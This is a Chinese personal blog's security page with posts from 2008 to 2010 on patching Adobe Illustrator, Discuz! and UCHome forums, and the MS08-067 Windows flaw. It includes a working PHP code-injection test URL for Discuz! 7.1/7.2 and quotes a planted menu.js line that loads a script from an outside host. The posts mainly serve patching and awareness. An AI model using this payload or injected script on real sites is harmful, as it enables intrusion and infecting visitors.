安全 – Lin's Space|Only

Adobe Illustrator CS4 and CS3未明缓冲区溢出漏洞

January 14th, 2010

No comments

受影响版本：Adobe Illustrator CS4 (14.0.0) and Adobe Illustrator CS3 (13.0.3 及之前版本),

受影响操作系统环境：Platform: Windows 和 Macintosh

描述：Adobe Illustrator是一款adobe公司最新出品的矢量图编辑软件。
Windows和Macintosh平台上的Adobe Illustrator CS4 (14.0.0)和Adobe Illustrator CS3 (13.0.3和之前版本)存在一个严重漏洞，允许攻击者以应用程序权限执行任意指令。（The vulnerabilities could lead to arbitrary code execution. ）

解决办法：Adobe已经提供了升级补丁

1、如果正在运行Illustrator CS4，请先退出。
2、打开Illustrator CS4的安装目录并备份 < 安装路径>\Adobe Illustrator CS4\Support Files\Contents\Windows\MPS.dll
3、下载补丁文件（http://download.macromedia.com/pub/security/bulletins/apsb10-01/win/APSB10_01_CS4_Win.zip），解压。
4、替换步骤2中的文件 MPS.dll < 安装路径>\Adobe Illustrator CS4\Support Files\Contents\Windows\
5. 删除 Illustrator 用户配置文件
Windows XP: {drive}\Documents and Settings\{user}\Application Data\Adobe\Adobe Illustrator CS4 Settings\
Windows Vista: {drive}\Users\{user}\AppData\Roaming\Adobe\Adobe Illustrator CS4 Settings\
6、运行 Illustrator CS4

打补丁参考：http://www.adobe.com/support/security/bulletins/apsb10-01.html

PS：前些天打算亲自动手做Logo，就装了这个，今天为这个不常用的家伙打安全更新补丁！

安全 Illustrator

Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)

January 6th, 2010

No comments

两个重要更新补丁包

涉及版本
Discuz! 7.1 , Discuz! 7.2
Discuz! 重要安全补丁 20100110 For Discuz! 7.1 Discuz! 7.2

本补丁包只适用于 UCenter Home 2.0 正式版
UCHome 2.0 正式版 20100106补丁包

从sebug获知，discuz 1.0最近爆出一个跨站漏洞和一个注入漏洞，另外从群里获知dz7.1和7.2存在“php远程执行代码”漏洞（上边的补丁包中已经修复）。uchome在特定php环境配置（register_globals为on）下存在一个注入漏洞。

Discuz! 7.1 & 7.2 远程代码执行漏洞细节
Discuz！新版本7.1与7.2版本中的include目录global.func.php中的showmessage函数内eval执行的参数($scriptlang)未初始化，可以任意提交，从而可以执行任意PHP命令。另外misc.php中showmessage使用的$response没有初始化可以作为一个利用点。

漏洞利用原理
showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。

简单的检测是否漏洞存在
注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

漏洞分析参考：Discuz! 7.1 & 7.2 远程代码执行漏洞

补充HTML测试代码：
Read more…

安全 Discuz, UCHome, 安全补丁

借助Browser Defender查看邻居是否危险

March 1st, 2009

No comments

今天查看邮件，发觉两个挺有意思的“Alerts”发来的Mail：

第一个，内容为
杂碎1：借助Browser Defender查看邻居是否危险

Browser Defender™ – Report for clin003.com
Browser Defender evaluates web sites for malicious downloads, exploits, phishing , annoyances such as excessive pop-ups, and other fraudulent practices.

点进去一看，原来是PCtools的Browser Defender对这个博客的检测结果页面，很好，很安全。:)

We have assessed this site and in our view it is safe to visit.

值得提出的是她可以帮忙查看从我这个博客出去的链接（大多为友情链接）是否都是安全的！

Online affiliations for clin003.com
Our testing of this site found no dangerous offsite links.
Links to other sites
Loading…
Analysis URL
…

还好有一个被警告（非友情链接，这说明Browser Defender给出的报告包括但不局限于友情链接，啰嗦！）之外其他都是安全和未知的。

最后看下Browser Defender的英文说明来

Browser Defender is a utility which protects your computer by providing you with an informative and helpful assessment of websites and the possible dangers they pose, thereby allowing you to make better informed choices when you browse the Internet.

A simple green, red or yellow rating lets you know immediately if, in ThreatExpert’s opinion, the website is safe to visit, harmful or needs to be visited with caution. If the website is not amongst our millions of crawled domains, then a grey rating will be shown. If you wish to submit a site to be assessed you can do so from the Browser Defender website.

另外还有针对Firefox的插件Toolbar可以使用
Browser Defender Toolbar

当然从官方网站也能直接下到用于ie的“插件”Toolbar。

第二封邮件，内容为
杂碎1：借助BackType来追踪个人在开放博客空间的评论

Comments by clin003.com — BackType
Comments by clin003.com on Lin’s空间|Only, Ericulous – Wordpress Themes, Plugins , Tips and Tricks and more.

进去后发现，大眼一看，这个地址全是抓取的这个博客的留言（feed）（非全部）！一下还没看出啥名堂来，首页的PR为5！

没错，是用来跟踪留言评论的，方便在任何开放评论的网站跟踪自己留下的评论（相当于自己的评论中心），还是来看看他的英文介绍吧

BackType is a service that lets you find, follow and share comments from across the web. Whenever you fill out the “Website” or “URL” field in a comment form when you publish a comment on a blog or other website, BackType attributes it to you. We give comment authors a profile featuring all the comments they’ve written on the Internet. If you don’t have a website to use when you fill out comment forms, sign up and use one of ours.

偶英文不好，就不来翻译啦。
跟踪的评论的“唯一性”有可能是根据留下的“用户名”和“网址”来判断的。

我不知道http://www.backtype.com/url/clin003.com 这个链接从她的主页上是怎么进去的，但通过这个链接演化一下把后边的地址改成“Dianso”在我博客留言使用的网址的话，发现能够看到“Dianso”在别的空间的留言内容（哇哈哈，发现新大陆啦）。
这样看来是非常方便自己追踪自己在开放博客或者空间的留言记录啦。真是个不错的东东，可惜英文的，对中文博客的跟踪即时性要缺失很多啦（看到她的首页的留言追踪记录在几分钟内）。

理想情况：这样似乎就不用担心自己在任何一个博客的评论分散问题啦。

SNS, 今日一点, 安全 BackType, Browser Defender, 评论跟踪

今日杂碎：预设QQ第二代密码保护结果

November 22nd, 2008

No comments

恭喜您，您QQ号码[*******]已经正式获得第二代密码保护！马上到这里体验新的保护功能吧！
。。。

不容易啊，而且这次申请还不到一星期就ok啦（以前都是3个月的观察期！！，而且结果都是没通过考验，第二代密码保护申请失败）！

关于QQ的其他链接：

QQ异常通知 http://yichang.qq.com/
QQ帐号服务中心 https://account.qq.com/
腾讯客服 http://service.qq.com/

今日一点, 安全 QQ, 密码保护

紧急对比更新Discuz论坛安全补丁包[20081117]

November 17th, 2008

1 comment

chinaz论坛爆“Discuz被挂马，受害人数三万多。官方补丁已出，赶紧打上吧 ”，补丁已出（http://download.comsenz.com/Discuz/patch/ ），不过在半小时前官方才放出来，都还在郁闷官方为啥没放补丁呢！

这次出问题的又是Wap字符转换问题，看来这个wap鸡肋可以去掉了，看官方给出的安全补丁公告：

http://www.discuz.net/thread-1113736-1-1.html

经查，Discuz! wap 功能部分在对文字进行编码转换时，存在合法变量被恶意覆盖问题，此问题将可能导致您的论坛受到安全性威胁。为此我们强烈建议您立即下载补丁进行修补。

* 此补丁包中含有 Discuz! 各版本程序，解开压缩包后，请根据您的版本号更新

* 本次修正不包含 Discuz! 7.0 测试版，建议参与测试的站点暂时关闭wap功能

* 如果您由于某种原因，无法及时修补，请您暂时关闭 “wap” 功能

据了解，是被修改了 menu.js

document.writeln(“<script language=javascript src=http:\/ \/www.54zc.cn\/17aq\/a.js><\/script>”)

在某网站统计服务网站查看，截止11月17日中午，受害人数已达34713人。

下午四点左右，Discuz官方康盛技术支持提供了Disucz！安全补丁

安全 Discuz, Wap

今日杂碎：补丁

October 25th, 2008

No comments

中午的时候看到WP的升级版本，然后紧急升级，因为那个漏洞应该算是前阵子RSS阅读器报的漏洞的延续，只不过这次可以直接给WP服务器注入SHELL，很BT，谁让你开着发现都谁引用你的文章呢（在后台首页右侧偏上），然后就发现这个MS08-067，话说是微软24日凌晨破例紧急公布的！各大网站都说“其危害程度毫不逊于当年波及80%以上Windows用户的“冲击波”病毒。”。

Server服务在默认情况下都是自动运行的，而Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。

但是在公司若不是特别情况我想管理员都会把“Server和Computer Browser服务”这禁掉的（局域网文件共享需要的），网吧就可能有点不同啦，因为需要共享？需要开启这个，而因为这个漏洞引入一只蠕虫，那整个网络就不要想安宁啦，一点都不逊于ARP攻击！！

需要说明的是：对于Windows 2000、XP和Server 2003，无需认证便可以利用这个漏洞；对于Windows Vista和Server 2008，可能需要进行认证。
目前这个漏洞正在被名为TrojanSpy:Win32/Gimmiv.A和TrojanSpy:Win32/Gimmiv.A.dll的木马积极的利用。网上已出现了利用该漏洞的蠕虫病毒(Win32/MS08067.gen!A)。据360安全专家分析，这一漏洞的危害极为严重，黑客仅根据IP地址便可随意发起攻击，简直是“指哪打哪”，而且感染性非常强，只要远程执行一段下载恶意程序的代码，不但能随意弹出广告、盗取用户账号，还可以控制本机进而攻击其他用户，使破坏力持续放大，局域网的用户一旦有一个中招病毒就会迅速扩散。被认为是微软近一年半以来首次打破每月定期安全公告的惯例而发布更新。

解决办法1：

微软官方补丁下载地址：

PoC已经被发布，请大家尽快转告安装补丁。我们已经看到大陆地区访问Update的客户端数量有少量减少，不过现在告诉所有人“请恢复启用Windows Automatic Update安装MS08-067，这么做不会下载正版验证WGA”，就像说“这狗不咬人”一样。所以下面把补丁的链接地址直接贴出，方便有所顾虑的用户尽快安装，谢谢！

中文版的MS08-067补丁:
Windows XP 安全更新程序 (KB958644)
Windows 2000 安全更新程序 (KB958644)
Windows Server 2003 安全更新程序 (KB958644)

英文版的MS08-067补丁：

Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 1
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP1 for Itanium-based Systems
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista and Windows Vista Service Pack 1
Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems
Windows Server 2008 for Itanium-based Systems

解决办法2：

禁用Server和Computer Browser服务。

在Windows Vista和Windows Server 2008上，阻断受影响的RPC标识符。在命令提示符中运行以下命令：

    netsh

然后在netsh环境中输入以下命令：

    netsh>rpc
    netsh rpc>filter
    netsh rpc filter>add rule layer=um actiontype=block
    netsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188
    netsh rpc filter>add filter
    netsh rpc filter>quit

在防火墙阻断TCP 139和445端口。
使用个人防火墙，如Internet连接防火墙。

黑客眼中的MS08-067

First Glimpse into MS08-067 Exploits In The Wild

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

When successful, hardcoded shellcode embedded within the malware, is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

Just hours following the patch release, public source code has already been seen distributing on the Internet. What more can I say ? Patch your systems ! Yes, NOW !

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. SeeDave’s blog for McAfee’s coverage.

MS08-067, How great it is!

Actually, This is not a stack overflow, but a stack overrun vulnerability.

There are two copies, the first copy is OK, but when there is another ”..\”, it will lead to start the another copy (repeat the first copy codes), the second copy firstly does not calculate the base pointer correctly (firstly it is basePointer-2, so the ’JZ’ checking in the loop of searching character ’\' will never come ture), that lead to get an unexpected stack pointer which is below the base pointer, after the wrong calculation, it starts the second copy and uses the unexpected pointer as the first parameter of function ”wcscpy()”, therefore, the wrong-calculation memory will be rewritten. The EIP will be controlled in the main function, probably.

MS Windows Server Service Code Execution PoC (MS08-067)

So play around a bit, you’ll get it working reliably…

Tracking MS08-067
While we haven’t seen widespread exploitation of this issue, there have been reports of a certain file, “n2.exe,” being downloaded on compromised computers. This file copies another piece of malicious code onto the compromised computer. Symantec products already detect both of these files as Infostealer.

引用大牛蛙的话：做盗版的“受害者”好过做盗贼的受害者，看黑色桌面好过让黑客看到你的桌面。

十月紧急额外安全公告

下图是SWI给出的各平台受MS08-067的影响图中文版，请参考。